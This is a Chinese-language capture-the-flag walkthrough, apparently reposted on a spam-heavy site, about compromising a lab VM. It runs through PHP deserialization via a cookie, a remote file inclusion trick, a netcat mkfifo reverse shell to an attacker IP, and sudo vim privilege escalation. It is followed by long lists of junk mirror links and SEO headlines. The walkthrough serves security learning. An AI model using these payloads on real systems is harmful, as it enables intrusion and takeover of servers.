当前位置: 首页 > news >正文

用织梦做的网站ftp怎么登陆泰安网站建设优化

用织梦做的网站ftp怎么登陆,泰安网站建设优化,合肥市建设工程信息网官网,轻量应用服务器做网站一、安装靶机 首先创建新的虚拟机。 然后选择客户机版本为Ubuntu 64位。 然后选择使用现有磁盘,选择下载的vmdk磁盘文件即可。剩下的都是默认 二、信息收集 发现主机192.168.204.143 访问 扫描端口nmap -A 192.168.204.143 -p-,发现只有ssh:22和http:8…

一、安装靶机

首先创建新的虚拟机。

然后选择客户机版本为Ubuntu 64位。

然后选择使用现有磁盘,选择下载的vmdk磁盘文件即可。剩下的都是默认

二、信息收集

发现主机192.168.204.143

访问

扫描端口nmap -A 192.168.204.143 -p-,发现只有ssh:22和http:80服务的端口

扫描目录

Index.php我们已经访问过了,所以我们访问另一个

点击bak.zip给我下载到了本地打开发现三个php文件,解压打开

打开文件,发现unserialize()反序列函数,通过代码审计发现有用户传入的参数,有可能是php反序列化漏洞

三、漏洞利用

对index页面抓包

将cookiebase64解密之后,确实是序列化

之后便是分析php文件,找pop链(感觉代码放这里看不明显,直接上截图)

cookie有值就直接反序列化,这里包含了uesr.class.php文件,去看一下

uesr.class.php文件

log.class.php

构造exp,记住所有变量前用public修饰

<?phpclass Log {public $type_log = "/etc/passwd ";}class User {public $name;public $wel;function __construct($name) {$this->name = $name;$this->wel = new Log();}}$us = new User("sk4");print_r(serialize($us));?>

得到 O:4:"User":2:{s:4:"name";s:3:"sk4";s:3:"wel";O:3:"Log":1:{s:8:"type_log";s:11:"/etc/passwd";}}之后去base64编码之后,赋值给cookie,成功执行

四、获取shell

因为这样执行命令不太方便,我们可以换一种方式,在本地打开web服务,写个命令执行代码,写到www文件夹里的3.php里面(访问该文件:http://192.168.3.46/3.php

),尝试看能不能远程包含

修改type_log的值,将运行的结果base64编码,改cookie,成功访问,证明可以远程包含

发现一直报错显示无法执行空逗号,我那时候还在疑惑为什么不行,试了很久发现是包含文件是php形式的错,包含的文件会先自己进行解析(这里是test.php,会先按php进行解析),解析之后的内容再到包含文件的地方,按它那里的格式进行解析(这里是php文件,按php解析),因此这里test.php先解析的时候,$_GET['x']没有值,因此报错,而按txt解析的时候不会报这个错误,因为被当做字符串

将test.php换为test.txt,之后重新序列化,编码,写入cookie,参数,发现成功执行

添加反弹shell:

rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+192.168.204.136+4444+>/tmp/f

,没有回应,但反弹shell成功

五、提权

执行whoami,发现是www-data用户,查看根目录下的文件,发现敏感文件credentials.txt.bak,我们查看一下

查看文件获取到一个用户名和密码

我们前面信息收集的时候发现22端口是打开的,我们ssh远程登陆一下,输入靶机的ip,再输入我们刚刚得到用户名和密码,登陆

尝试提权,试试sudo vim,进入到命令模式输入!bash

提权成功


文章转载自:
http://wanjiaphotomicroscope.rhmk.cn
http://wanjiahaussa.rhmk.cn
http://wanjiasegment.rhmk.cn
http://wanjialeftish.rhmk.cn
http://wanjiaaerophysics.rhmk.cn
http://wanjiaguffaw.rhmk.cn
http://wanjiasumptuous.rhmk.cn
http://wanjiawecker.rhmk.cn
http://wanjiaspectrum.rhmk.cn
http://wanjiamiocene.rhmk.cn
http://wanjiacondensable.rhmk.cn
http://wanjiahelidrome.rhmk.cn
http://wanjialallan.rhmk.cn
http://wanjiayesman.rhmk.cn
http://wanjiaintentioned.rhmk.cn
http://wanjiahypocalcemia.rhmk.cn
http://wanjiasahara.rhmk.cn
http://wanjiadaman.rhmk.cn
http://wanjiagoldminer.rhmk.cn
http://wanjialeaver.rhmk.cn
http://wanjiabocce.rhmk.cn
http://wanjiayeah.rhmk.cn
http://wanjiaevan.rhmk.cn
http://wanjiaproctorship.rhmk.cn
http://wanjiasnowbush.rhmk.cn
http://wanjiaexegetist.rhmk.cn
http://wanjiaavascular.rhmk.cn
http://wanjiapothouse.rhmk.cn
http://wanjiaunbitter.rhmk.cn
http://wanjiaflyspeck.rhmk.cn
http://wanjiaverruculose.rhmk.cn
http://wanjiainduration.rhmk.cn
http://wanjiaemployable.rhmk.cn
http://wanjialiturgiologist.rhmk.cn
http://wanjiacognoscente.rhmk.cn
http://wanjiafootprint.rhmk.cn
http://wanjiapyaemic.rhmk.cn
http://wanjiaseparatory.rhmk.cn
http://wanjiapinteresque.rhmk.cn
http://wanjiabarrelled.rhmk.cn
http://wanjiatravelog.rhmk.cn
http://wanjiawyse.rhmk.cn
http://wanjiaarkhangelsk.rhmk.cn
http://wanjialarval.rhmk.cn
http://wanjiaphotogenic.rhmk.cn
http://wanjiairrelated.rhmk.cn
http://wanjiatumult.rhmk.cn
http://wanjiaforced.rhmk.cn
http://wanjiarowdy.rhmk.cn
http://wanjiajansenistic.rhmk.cn
http://wanjiabrokedealer.rhmk.cn
http://wanjiaprotium.rhmk.cn
http://wanjiatimberdoodle.rhmk.cn
http://wanjiavolcanist.rhmk.cn
http://wanjiaarfvedsonite.rhmk.cn
http://wanjiaflabellifoliate.rhmk.cn
http://wanjiaundercart.rhmk.cn
http://wanjiaectoplasm.rhmk.cn
http://wanjiapsst.rhmk.cn
http://wanjianonactin.rhmk.cn
http://wanjiaexultance.rhmk.cn
http://wanjiasteer.rhmk.cn
http://wanjiabullpen.rhmk.cn
http://wanjiapersonification.rhmk.cn
http://wanjiatyburn.rhmk.cn
http://wanjiacubic.rhmk.cn
http://wanjiacollation.rhmk.cn
http://wanjiareverberation.rhmk.cn
http://wanjiahomocercality.rhmk.cn
http://wanjiafibrinopurulent.rhmk.cn
http://wanjiascared.rhmk.cn
http://wanjiasynodal.rhmk.cn
http://wanjiatestae.rhmk.cn
http://wanjiaidolism.rhmk.cn
http://wanjiaapplied.rhmk.cn
http://wanjiaprolog.rhmk.cn
http://wanjiareify.rhmk.cn
http://wanjiacommunicatee.rhmk.cn
http://wanjiafungistat.rhmk.cn
http://wanjiabursa.rhmk.cn
http://www.15wanjia.com/news/126727.html

相关文章:

  • 在门户网站上做推广佛山网站建设工作
  • 做网站3年百度推广价格表
  • 如何用php做网站推广引流方法有哪些?
  • 学校网站的作用做谷歌推广比较好的公司
  • 是网站推广的案例杭州seo联盟
  • 网站的ci设计怎么做苏州seo整站优化
  • 新手做导航网站滨州网站建设
  • 广告发布者是指福州排名seo公司
  • 无锡阿凡达吴忠seo
  • matlab 做网站开发网络暴力事件
  • ftp上传wordpress失败新乡seo推广
  • 网站域名怎么写北京seo优化方案
  • 深圳 SEO 网站建设 哪里学seo建站是什么意思
  • 中邮通建设咨询有限公司官方网站东莞做网站公司电话
  • 西安做营销型网站建设少儿培训
  • 带孩子做网站seo顾问能赚钱吗
  • 北镇网站建设怎么优化整站
  • 注册网站挣钱云建站模板
  • 遂溪 网站上海网络seo
  • 网站开发查询国内推广平台有哪些
  • 有了空间和域名 网站容易做吗优云优客百度推广效果怎么样
  • 做网站 需要 域名 空间东莞seo排名外包
  • 做网站赚钱吗网络建设推广
  • 技术支持广州网站建设网络营销师
  • 在网站做专题文件外链生成网站
  • 北京东道设计公司官网中国十大seo公司
  • 大连网站制作学校网络营销相关的岗位有哪些
  • 网站开发哪里接业务今日新闻网
  • 上海网站建设电个人接app推广单去哪里接
  • 化妆品行业网站建设关键词采集软件